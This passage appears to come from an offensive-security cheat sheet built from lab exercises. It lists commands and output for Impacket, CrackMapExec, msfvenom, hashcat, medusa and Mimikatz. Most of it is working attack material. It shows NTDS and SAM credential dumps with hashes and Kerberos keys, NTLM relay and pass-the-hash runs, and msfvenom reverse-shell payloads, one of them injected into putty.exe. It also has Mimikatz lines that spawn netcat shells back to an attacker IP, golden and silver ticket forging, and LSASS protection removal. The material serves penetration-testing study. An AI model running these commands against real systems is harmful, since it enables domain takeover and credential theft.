1$:plain_password_hex:e075595bd6202a07ae5c685801d1baf40dc79e2ef7fbe45d72654cff2e27cd2c563ba37e8b29e1e5dd7ca5c35f0560067b2733cbe5664a8de7edd5e4a716f5a2648e7970ec406c685dd47c9037d885164b6cf93f2d425365749890921aa82a3054fd8e49a674914e6c831e9f55c98cdffc24749235e59a14d2c71d4cdad3e28048559764269f446ef5270e34388159d3828308de06a32f68aaa3d2f49c4ad0a0da10fd65c05760bf31341b459a027fd54bfd300ae0db8e8b7a374352908ff5d2b775ccb6f015b0251d3ca47a443c733052643ccfce71cffce86e6941727bfbe439f628f06d4a3edb6216950d434c7ca4 CONTROLLER\CONTROLLER-1$:aad3b435b51404eeaad3b435b51404ee:811e021e0b4e1313d654b27f91e83c0d::: [*] DPAPI_SYSTEM dpapi_machinekey:0x83f9488e2aeef29b354be313f76363f8e5770bf2 dpapi_userkey:0x7c5d37fa459e37a1e9a3180c44092d5143490810 [*] NL$KM 0000 68 09 BC 65 4B C4 62 83 B2 D1 FA B7 79 5B 82 86 h..eK.b.....y[.. 0010 41 7E 09 44 96 24 E4 86 A4 23 66 F2 94 C9 F1 5D A~.D.$...#f....] 0020 2D 1A 9D 14 B4 B3 35 54 27 B3 CB B1 E0 9A 26 82 -.....5T'.....&. 0030 EB 40 75 72 EF 11 38 05 9C 50 E2 32 86 B1 FD CB [email protected].... NL$KM:6809bc654bc46283b2d1fab7795b8286417e09449624e486a42366f294c9f15d2d1a9d14b4b3355427b3cbb1e09a2682eb407572ef1138059c50e23286b1fdcb [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:2777b7fec870e04dda00cd7260f7bee6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72cd714611b64cd4d5550cd2759db3f6::: CONTROLLER.local\Machine1:1103:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: CONTROLLER.local\Machine2:1104:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0::: CONTROLLER.local\Admin1:1105:aad3b435b51404eeaad3b435b51404ee:3e920318c828abe5f652109e4ff0866d::: [...] [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:42b3c13c8c0fef3175eb2b5926f805f919123efd001a9c5a16ee9a86101e32b4 Administrator:aes128-cts-hmac-sha1-96:d01d6ccf97a2ee214ec7185173a3b659 Administrator:des-cbc-md5:918abaf7dcb02ce6 krbtgt:aes256-cts-hmac-sha1-96:dfb518984a8965ca7504d6d5fb1cbab56d444c58ddff6c193b64fe6b6acf1033 krbtgt:aes128-cts-hmac-sha1-96:88cc87377b02a885b84fe7050f336d9b krbtgt:des-cbc-md5:79bf07137a8a6b8f CONTROLLER.local\Machine1:aes256-cts-hmac-sha1-96:63f8cf507d238bc84a2c0486dae6298d8823ae1565beb040393afc704c53acf3 CONTROLLER.local\Machine1:aes128-cts-hmac-sha1-96:7db83a942d11c7441513c5c1f712319b [...] [*] Cleaning up... root@ip-10-10-177-75:/opt/impacket/examples## Extracting SAM NTLM hashes from sam and system registry hives & shadow volume - secretsdump.py [*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3a787a80d08385cea7fb4aa2a4261::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Cleaning up...# Extracting NTDS - secretsdump.py [*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821 [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC $MACHINE.ACC:plain_password_hex:cd3557a805cd9dc8973cba946045b4c210ffa62c68bd294b747ad49b7bb4eb740100de6d03527b7e49cf05c99376a7c9087980ed601edae0ee8106360ff097f28d6f27139d75826fbcd9aae542582a7cbfe1a95bd68d372859dffad6320e648abc558038cc826d4ecdbff03f3ddebafe9b887511c977ec1da0e02b9e5e560502b635ac4c9243d55259de10cb58147cbca325ba5c678082562ed8098e92adc89d4cc19d0fffa069156e938a44c43c2f576be27d35e719dfe2960abad4b1844e0dcc4cd47cc710727f42ede02d12a4db5349156c13aa804a65b5ae75f339ddb29faee327c674c5945717e50cdc216a1fb0 $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:a8700dec959b069eec78964e18f27da8 [*] DPAPI_SYSTEM dpapi_machinekey:0x0e88ce11d311d3966ca2422ac2708a4d707e00be dpapi_userkey:0x8b68be9ef724e59070e7e3559e10078e36e8ab32 [*] NL$KM 0000 8D D2 8E 67 54 58 89 B1 C9 53 B9 5B 46 A2 B3 66 ...gTX...S.[F..f 0010 D4 3B 95 80 92 7D 67 78 B7 1D F9 2D A5 55 B7 A3 .;...}gx...-.U.. 0020 61 AA 4D 86 95 85 43 86 E3 12 9E C4 91 CF 9A 5B a.M...C........[ 0030 D8 BB 0D AE FA D3 41 E0 D8 66 3D 19 75 A2 D1 B2 ......A..f=.u... NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 55db1e9562985070bbba0ef2cc25754c [*] Reading and decrypting hashes from ./Active Directory/ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc9b72f354f0371219168bdb1460af32::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:a8700dec959b069eec78964e18f27da8::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d::: thm.red\thm:1114:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889::: thm.red\victim:1115:aad3b435b51404eeaad3b435b51404ee:6c3d8f78c69ff2ebc377e19e96a10207::: [...] [*] Kerberos keys from ./Active Directory/ntds.dit Administrator:aes256-cts-hmac-sha1-96:510e0d5515009dc29df8e921088e82b2da0955ed41e83d4c211031b99118bf30 Administrator:aes128-cts-hmac-sha1-96:bab514a24ef3df25c182f5520bfc54a0 Administrator:des-cbc-md5:6d34e608f8574632 CREDS-HARVESTIN$:aes256-cts-hmac-sha1-96:5f85915d4ec0ee993d88c025533708c2eb44b79f43c28cb3a03708f63311c51a CREDS-HARVESTIN$:aes128-cts-hmac-sha1-96:6970d5c90fc88c455b61ac895e9119f6 CREDS-HARVESTIN$:des-cbc-md5:20efa17cb373d337 krbtgt:aes256-cts-hmac-sha1-96:24fad271ecff882bfce29d8464d84087c58e5db4083759e69d099ecb31573ad3 krbtgt:aes128-cts-hmac-sha1-96:2feb0c1629b37163d59d4c0deb5ce64c krbtgt:des-cbc-md5:d92ffd4abf02b049 thm.red\thm:aes256-cts-hmac-sha1-96:2a54bb9728201d8250789f5e793db4097630dcad82c93bcf9342cb8bf20443ca thm.red\thm:aes128-cts-hmac-sha1-96:70179d57a210f22ad094726be50f703c [...] [*] Cleaning up... root@ip-10-10-150-52:~## Perform DC-Sync remotely - secretsdump.py Password: [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc9b72f354f0371219168bdb1460af32::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d::: thm.red\thm:1114:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889::: thm.red\victim:1115:aad3b435b51404eeaad3b435b51404ee:6c3d8f78c69ff2ebc377e19e96a10207::: [...] [*] Cleaning up... root@ip-10-10-150-52:~## Executing files over SMB from linux - smbexec.py [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> Then launch shell: c:\Users\Administrator\Desktop\shell.exe# Relay NTLM authentication capture to -T target - ntlmrelayx.py [*] Protocol Client IMAPS loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client DCSYNC loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [...] [*] Running in relay mode to single host [*] Setting up SMB Server [*] Setting up HTTP Server on port 80 [*] Setting up RAW Server on port 6666 [*] Servers started, waiting for connections [*] SMBD-Thread-5: Received connection from 10.200.72.202, attacking target smb://10.200.72.201 [*] Authenticating against smb://10.200.72.201 as ZA/THMSERVER2$ SUCCEED [+] No more targets [*] SMBD-Thread-7: Connection from 10.200.72.202 controlled, but there are no more targets left! [+] No more targets [*] SMBD-Thread-8: Connection from 10.200.72.202 controlled, but there are no more targets left! [*] Service RemoteRegistry is in stopped state [...] [*] Target system bootKey: 0x4e05e7ea4fdddde75aa56010474948dc [+] Saving remote SAM database [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) [+] Calculating HashedBootKey from SAM [+] NewStyle hashes is: True ServerAdmin:500:aad3b435b51404eeaad3b435b51404ee:3279a0c6dfe15dc3fb6e9c26dd9b066c::: [...] [*] Done dumping SAM hashes for host: 10.200.72.201 [*] Stopping service RemoteRegistry# Pass-the-hash - psexec.py [*] Requesting shares on 10.10.203.243..... [*] Found writable share ADMIN$ [*] Uploading file gYXGGCjx.exe [*] Opening SVCManager on 10.10.203.243..... [*] Creating service JsxB on 10.10.203.243..... [*] Starting service JsxB..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.1821] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system# Serving files - smbserver.py [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.203.243,49907) [*] AUTHENTICATE_MESSAGE (WPRIVESC2\THMBackup,WPRIVESC2) [*] User WPRIVESC2\THMBackup authenticated successfully [*] THMBackup::WPRIVESC2:aaaaaaaaaaaaaaaa:3c80cd0ac47d4b4a7d45f34defbe663f:010100000000000000a053a5cd4cdc01a966444d2c989a690000000001001000530074005a0059006e0069005600710003001000530074005a0059006e0069005600710002001000460079006c00700066007a006c00690004001000460079006c00700066007a006c0069000700080000a053a5cd4cdc0106000400020000000800300030000000000000000000000000300000d6eac08cccf660286908c2e9b8cf391ab727daa14772f3cc23fad015f3db5d2b0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e003200310038002e00380033000000000000000000 [*] Connecting Share(1:IPC$) [*] Connecting Share(2:public) [*] Disconnecting Share(1:IPC$) [*] Disconnecting Share(2:public) [*] Closing down connection (10.10.203.243,49907)
9. CrackMapExec (CME)
-
Use Case: Mass auth, enumeration, and command execution across Windows domains. Github
-
Input Example:
crackmapexec ssh 10.10.81.188 -u burgess -p 'Fall2021@'crackmapexec smb 10.10.223.203 -u Administrator -p 'P@$$W0rd'crackmapexec smb 10.10.223.203 -u Administrator -p 'P@$$W0rd' --sharescrackmapexec smb 10.10.223.203 -u Administrator -p 'P@$$W0rd' -x 'whoami'crackmapexec smb 10.10.223.203 -u Administrator -p 'P@$$W0rd' --exec-method smbexec -x 'powershell -c "hostname"'crackmapexec ftp 10.10.144.205 -u ftp -p ftp --lsVersion : 6.1.0 Codename: John Wick options: -h, --help show this help message and exit -t THREADS set how many concurrent threads to use (default: 100) --timeout TIMEOUT max timeout in seconds of each thread (default: None) --jitter INTERVAL sets a random delay between each connection (default: None) --no-progress Not displaying progress bar during scan --verbose enable verbose output --debug enable debug level information --version Display CME version protocols: available protocols {ftp,ldap,mssql,rdp,smb,ssh,vnc,winrm,wmi} ftp own stuff using FTP ldap own stuff using LDAP mssql own stuff using MSSQL rdp own stuff using RDP smb own stuff using SMB ssh own stuff using SSH vnc own stuff using VNC winrm own stuff using WINRM wmi own stuff using WMI -
Output Example:
SSH 10.10.81.188 22 10.10.81.188 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.13 SSH 10.10.81.188 22 10.10.81.188 [+] burgess:Fall2021@ - shell access! root@ip-10-10-169-75:~#SMB 10.10.223.203 445 DOMAIN-CONTROLL [*] Windows 10.0 Build 17763 x64 (name:DOMAIN-CONTROLL) (domain:CONTROLLER.local) (signing:True) (SMBv1:False) SMB 10.10.223.203 445 DOMAIN-CONTROLL [+] CONTROLLER.local\Administrator:P@$$W0rd (Pwn3d!) NOTE: (Pwn3d!) → CME detected that this account has administrative rights on the target (full compromise).SMB 10.10.223.203 445 DOMAIN-CONTROLL [*] Windows 10.0 Build 17763 x64 (name:DOMAIN-CONTROLL) (domain:CONTROLLER.local) (signing:True) (SMBv1:False) SMB 10.10.223.203 445 DOMAIN-CONTROLL [+] CONTROLLER.local\Administrator:P@$$W0rd (Pwn3d!) SMB 10.10.223.203 445 DOMAIN-CONTROLL [*] Enumerated shares SMB 10.10.223.203 445 DOMAIN-CONTROLL Share Permissions Remark SMB 10.10.223.203 445 DOMAIN-CONTROLL ----- ----------- ------ SMB 10.10.223.203 445 DOMAIN-CONTROLL ADMIN$ READ,WRITE Remote Admin SMB 10.10.223.203 445 DOMAIN-CONTROLL C$ READ,WRITE Default share SMB 10.10.223.203 445 DOMAIN-CONTROLL IPC$ READ Remote IPC SMB 10.10.223.203 445 DOMAIN-CONTROLL NETLOGON READ,WRITE Logon server share SMB 10.10.223.203 445 DOMAIN-CONTROLL Share READ,WRITE SMB 10.10.223.203 445 DOMAIN-CONTROLL SYSVOL READ Logon server shareSMB 10.10.223.203 445 DOMAIN-CONTROLL [*] Windows 10.0 Build 17763 x64 (name:DOMAIN-CONTROLL) (domain:CONTROLLER.local) (signing:True) (SMBv1:False) SMB 10.10.223.203 445 DOMAIN-CONTROLL [+] CONTROLLER.local\Administrator:P@$$W0rd (Pwn3d!) SMB 10.10.223.203 445 DOMAIN-CONTROLL [+] Executed command via wmiexec SMB 10.10.223.203 445 DOMAIN-CONTROLL controller\administrator NOTE: wmiexec is stealthy as no service is createdSMB 10.10.223.203 445 DOMAIN-CONTROLL [*] Windows 10.0 Build 17763 x64 (name:DOMAIN-CONTROLL) (domain:CONTROLLER.local) (signing:True) (SMBv1:False) SMB 10.10.223.203 445 DOMAIN-CONTROLL [+] CONTROLLER.local\Administrator:P@$$W0rd (Pwn3d!) SMB 10.10.223.203 445 DOMAIN-CONTROLL [+] Executed command via smbexec SMB 10.10.223.203 445 DOMAIN-CONTROLL Domain-Controller NOTE: smbexec also creates a service (similar to PsExec) to execute commandsFTP 10.10.144.205 21 10.10.144.205 [*] Banner: (vsFTPd 3.0.5) FTP 10.10.144.205 21 10.10.144.205 [+] ftp:ftp FTP 10.10.144.205 21 10.10.144.205 [*] Directory Listing FTP 10.10.144.205 21 10.10.144.205 drwxr-xr-x 2 111 116 4096 Oct 12 2021 files
10. msfvenom
-
Use Case: Payload generation for Metasploit or standalone droppers. Github
-
Input Example:
# Catch with metasploit handler msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.4 LPORT=443 -f exe -o agent.exe# Catch with netcat msfvenom -p windows/shell_reverse_tcp lhost=10.10.74.154 lport=4444 -f exe -o payload.exe# Catch with metasploit handler msfvenom -p windows/shell/reverse_tcp lhost=10.10.74.154 lport=4444 -f exe -o payload.exe# Catch with netcat msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=10.10.50.56 lport=4444 -b "\x00" -f exe -o puttyX.exe✅ Extra Notes -x putty.exe → Injects the payload into the original Putty executable (file binding). -k → Keeps the original functionality of Putty after infection. -b "\x00" → Avoids null bytes in the payload (important for stability). -f exe → Output format is Windows executable.⚠️ Warning: Important notes on staged vs. stageless / un-staged
✅ If you want Netcat to catch the shell: Netcat only handles raw TCP streams, so you need to use a generic, un-staged reverse shell payload (windows/shell_reverse_tcp). ✅ If you want Metasploit to catch the shell: Metasploit reverse_tcp payload sends a staged connection that requires the Metasploit handler to deliver the second stage.# Create a powershell payload msfvenom -p windows/meterpreter/reverse_winhttps LHOST=AttackBox_IP LPORT=4443 -f psh-reflection > liv0ff.ps1 -
Output Example:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 854 bytes Final size of exe file: 7168 bytes Saved as: agent.exe
11. hashcat
-
Use Case: Offline password cracking (hashes of many types). Github
-
Input Example:
hashcat -a 0 -m 100 8d6e34f987851aa599257d3831a1af040886842f /usr/share/wordlists/rockyou.txthashcat -a 3 -m 0 e48e13207341b6bffb7fb1622282247b ?d?d?d?dhashcat -a 0 -m 13100 tgs.hash /usr/share/wordlists/rockyou.txt# Hash intercepted by responder - NetNTLMv2 format hashcat -m 5600 $hash passwords.txt --forceAttack Modes (-a): 0 = Straight Dictionary Attack Example: hashcat -m 500 -a 0 hash.txt dict.txt 1 = Combination Attack Example: hashcat -m 500 -a 1 hash.txt dict1.txt dict2.txt 3 = Brute Force Attack Example: hashcat -m 500 -a 3 hash.txt ?l?d?u 6 = Hybrid Wordlist + Mask Example: hashcat -m 500 -a 6 hash.txt wordlist.txt ?d?s 7 = Mask + Wordlist Example: hashcat -m 500 -a 7 hash.txt ?d?s wordlist.txt -
Output Example:
[...] Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 2 secs 8d6e34f987851aa599257d3831a1af040886842f:sunshine Session..........: hashcat Status...........: Cracked Hash.Mode........: 100 (SHA1) Hash.Target......: 8d6e34f987851aa599257d3831a1af040886842f Time.Started.....: Fri Nov 7 15:48:31 2025 (0 secs) Time.Estimated...: Fri Nov 7 15:48:31 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 8730 H/s (0.05ms) @ Accel:256 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 512/14344385 (0.00%) Rejected.........: 0/512 (0.00%) Restore.Point....: 0/14344385 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: 123456 -> letmein Started: Fri Nov 7 15:47:46 2025 Stopped: Fri Nov 7 15:48:32 2025[...] e48e13207341b6bffb7fb1622282247b:1337 Session..........: hashcat Status...........: Cracked Hash.Mode........: 0 (MD5) Hash.Target......: e48e13207341b6bffb7fb1622282247b Time.Started.....: Fri Nov 7 16:13:28 2025 (0 secs) Time.Estimated...: Fri Nov 7 16:13:28 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Mask.......: ?d?d?d?d [4] Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 64306 H/s (0.15ms) @ Accel:256 Loops:10 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 10000/10000 (100.00%) Rejected.........: 0/10000 (0.00%) Restore.Point....: 512/1000 (51.20%) Restore.Sub.#1...: Salt:0 Amplifier:0-10 Iteration:0-10 Candidate.Engine.: Device Generator Candidates.#1....: 1813 -> 6764 Started: Fri Nov 7 16:13:08 2025 Stopped: Fri Nov 7 16:13:30 2025
12. medusa
-
Use Case: Parallelized online brute forcing (alternative to Hydra, although it is less flexible than Hydra at HTTP form brute forcing. Only basic, digest, and NTLM auth supported). Github
-
Input Example:
medusa -h 10.10.144.205 -u ftp -p ftp -M ftpmedusa -h 10.10.81.19 -U usernames-list.txt -P seasons-exp.txt -M ssh -t 5medusa -dAvailable modules in "/usr/lib/x86_64-linux-gnu/medusa/modules" : + cvs.mod : Brute force module for CVS sessions : version 2.0 + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1 + http.mod : Brute force module for HTTP : version 2.1 + imap.mod : Brute force module for IMAP sessions : version 2.0 + mssql.mod : Brute force module for M$-SQL sessions : version 2.0 + mysql.mod : Brute force module for MySQL sessions : version 2.0 + nntp.mod : Brute force module for NNTP sessions : version 2.0 + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0 + pop3.mod : Brute force module for POP3 sessions : version 2.0 + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0 + rexec.mod : Brute force module for REXEC sessions : version 2.0 + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0 + rsh.mod : Brute force module for RSH sessions : version 2.0 + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1 + smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1 + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0 + snmp.mod : Brute force module for SNMP Community Strings : version 2.1 + ssh.mod : Brute force module for SSH v2 sessions : version 2.1 + svn.mod : Brute force module for Subversion sessions : version 2.1 + telnet.mod : Brute force module for telnet sessions : version 2.0 + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0 + vnc.mod : Brute force module for VNC sessions : version 2.1 + web-form.mod : Brute force module for web forms : version 2.1 + wrapper.mod : Generic Wrapper Module : version 2.0Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT] -h [TEXT] : Target hostname or IP address -H [FILE] : File containing target hostnames or IP addresses -u [TEXT] : Username to test -U [FILE] : File containing usernames to test -p [TEXT] : Password to test -P [FILE] : File containing passwords to test -C [FILE] : File containing combo entries. See README for more information. -O [FILE] : File to append log information to -e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username) -M [TEXT] : Name of the module to execute (without the .mod extension) -m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a different parameter each time and they will all be sent to the module (i.e. -m Param1 -m Param2, etc.) -d : Dump all known modules -n [NUM] : Use for non-default TCP port number -s : Enable SSL -g [NUM] : Give up after trying to connect for NUM seconds (default 3) -r [NUM] : Sleep NUM seconds between retry attempts (default 3) -R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1. -c [NUM] : Time to wait in usec to verify socket is available (default 500 usec). -t [NUM] : Total number of logins to be tested concurrently -T [NUM] : Total number of hosts to be tested concurrently -L : Parallelize logins using one username per thread. The default is to process the entire username before proceeding. -f : Stop scanning host after first valid username/password found. -F : Stop audit after first valid username/password found on any host. -b : Suppress startup banner -q : Display module's usage information -v [NUM] : Verbose level [0 - 6 (more)] -w [NUM] : Error debug level [0 - 10 (more)] -V : Display version -Z [TEXT] : Resume scan based on map of previous scan -
Output Example:
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]> ACCOUNT CHECK: [ftp] Host: 10.10.144.205 (1 of 1, 0 complete) User: ftp (1 of 1, 0 complete) Password: ftp (1 of 1 complete) ACCOUNT FOUND: [ftp] Host: 10.10.144.205 User: ftp Password: ftp [SUCCESS][...] ACCOUNT CHECK: [ssh] Host: 10.10.81.19 (1 of 1, 0 complete) User: burgess (3 of 5, 1 complete) Password: Fall2020@ (17 of 40 complete) ACCOUNT FOUND: [ssh] Host: 10.10.81.19 User: burgess Password: Fall2021@ [SUCCESS] ACCOUNT CHECK: [ssh] Host: 10.10.81.19 (1 of 1, 0 complete) User: phillips (2 of 5, 2 complete) Password: Fall2020$ (37 of 40 complete) [...]
13. Mimikatz
-
Use Case: Credential dumping, tickets, WDIGEST/LSASS inspection. Github
-
Input Example:
# Extracting NTLM hashes from local SAM privilege::debug token::elevate lsadump::sam# Extracting NTLM hashes from LSASS memory (MSV only) sekurlsa::msv# Extracting NTLM hashes from LSASS memory (all data) sekurlsa::logonpasswords# Extracting LSASS hashes on a machine with LSASS protection mimikatz # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) mimikatz # !+ [*] 'mimidrv' service not present [+] 'mimidrv' service successfully registered [+] 'mimidrv' service ACL to everyone [+] 'mimidrv' service started mimikatz # mimikatz # !processprotect /process:lsass.exe /remove Process : lsass.exe PID 836 -> 00/00 [0-0-0] mimikatz ## Re-establish our original token privileges, as trying to pass-the-hash with an elevated token won't work. token::revert # With PtH, any commands executed on the caught shell will use bob jenkins credentials sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe 10.50.46.84 5555"# Prepare for pass-the-ticket attack sekurlsa::tickets /export# Execute pass-the-ticket attack kerberos::ptt [0;3e4]-2-0-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi * File: '[0;3e4][email protected]': OK mimikatz ## Check DC-Sync rights lsadump::dcsync /user:Administrator# Extract the krtgt NTLM hash lsadump::dcsync /user:krbtgt# Create a golden ticket kerberos::golden /user:Administrator /domain:CONTROLLER.LOCAL /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500 /groups:512 /ptt # We can also run the following to specify ticket lifetime (default 10 years) and the maximum ticket lifetime for renewal (default 10 years). # Also note that the username we want to impersonate does not have to be a valid user. kerberos::golden /admin:ReallyNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:<Domain SID> /krbtgt:<NTLM hash of KRBTGT account> /endin:600 /renewmax:10080 /ptt# Confirm the Golden Ticket was successfully created and injected kerberos::list# Generate a Silver ticket for CIFS service, using the rc4 (NTLM) hash of the SQL service account kerberos::golden /admin:StillNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt# DC-Sync All lsadump::dcsync /domain:controller.local /all# Prepare for Overpass-the-hash and Pass-the-key sekurlsa::ekeys# Pass-the-key attack # Note the use of the aes256 key sekurlsa::pth /user:Administrator /domain:controller.local /aes256:42b3c13c8c0fef3175eb2b5926f805f919123efd001a9c5a16ee9a86101e32b4 /run:"c:\Users\Administrator\Downloads\ncat.exe -e cmd.exe 10.10.177.75 5556"# Overpass-the-hash attack # Note the use of the RC4 key - basically the NTLM hash sekurlsa::pth /user:Administrator /domain:controller.local /rc4:2777b7fec870e04dda00cd7260f7bee6 /run:"c:\Users\Administrator\Downloads\ncat.exe -e cmd.exe 10.10.177.75 5557"# Patch memory to make certificates exportable mimikatz # privilege::debug Privilege '20' OK mimikatz # crypto::capi Local CryptoAPI RSA CSP patched Local CryptoAPI DSS CSP patched mimikatz # crypto::cng "KeyIso" service patched mimikatz # # Export certificates crypto::certificates /systemstore:local_machine /export# Enumerate stored credentials vault::list -
Output Example:
# Extracting NTLM hashes from local SAM Privilege '20' OK ---------------------------------- Token Id : 0 User name : SID name : NT AUTHORITY\SYSTEM 664 {0;000003e7} 1 D 17764 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary -> Impersonated ! * Process Token : {0;001b7659} 0 D 1802104 ZA\t2_felicia.dean S-1-5-21-3330634377-1326264276-632209373-4605 (12g,24p) Primary * Thread Token : {0;000003e7} 1 D 1856143 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation) ------------------------------------ Domain : THMJMP2 SysKey : 2e27b23479e1fb1161a839f9800119eb Local SID : S-1-5-21-1946626518-647761240-1897539217 SAMKey : 9a74a253f756d6b012b7ee3d0436f77a RID : 000001f4 (500) User : Administrator Hash NTLM: 0b2571be7e75e3dbd169ca5352a2dad7 RID : 000001f5 (501) User : Guest RID : 000001f7 (503) User : DefaultAccount# Extracting NTLM hashes from LSASS memory (MSV only) Authentication Id : 0 ; 1024616 (00000000:000fa268) Session : RemoteInteractive from 7 User Name : t1_toby.beck4 Domain : ZA Logon Server : THMDC Logon Time : 10/15/2025 12:49:48 PM SID : S-1-5-21-3330634377-1326264276-632209373-4619 msv : [00000003] Primary * Username : t1_toby.beck4 * Domain : ZA * NTLM : 533f1bd576caa912bdb9da284bbc60fe * SHA1 : 8a65216442debb62a3258eea4fbcbadea40ccc38 * DPAPI : 47d511de8e208dc0053e88223dcdd31c Authentication Id : 0 ; 1020026 (00000000:000f907a) Session : Interactive from 7 User Name : DWM-7 Domain : Window Manager Logon Server : (null) Logon Time : 10/15/2025 12:49:48 PM SID : S-1-5-90-0-7 msv : [00000003] Primary * Username : THMJMP2$ * Domain : ZA * NTLM : 894c4a1dba8abfcbc88b46e7c8da319a * SHA1 : 6b57d16c54982776f3a96978d854e6d912b9844f[...] # Extracting NTLM hashes from LSASS memory (all data) Authentication Id : 0 ; 584937 (00000000:0008ece9) Session : Interactive from 3 User Name : DWM-3 Domain : Window Manager Logon Server : (null) Logon Time : 10/15/2025 12:49:04 PM SID : S-1-5-90-0-3 msv : [00000003] Primary * Username : THMJMP2$ * Domain : ZA * NTLM : 894c4a1dba8abfcbc88b46e7c8da319a * SHA1 : 6b57d16c54982776f3a96978d854e6d912b9844f tspkg : wdigest : * Username : THMJMP2$ * Domain : ZA * Password : (null) kerberos : * Username : 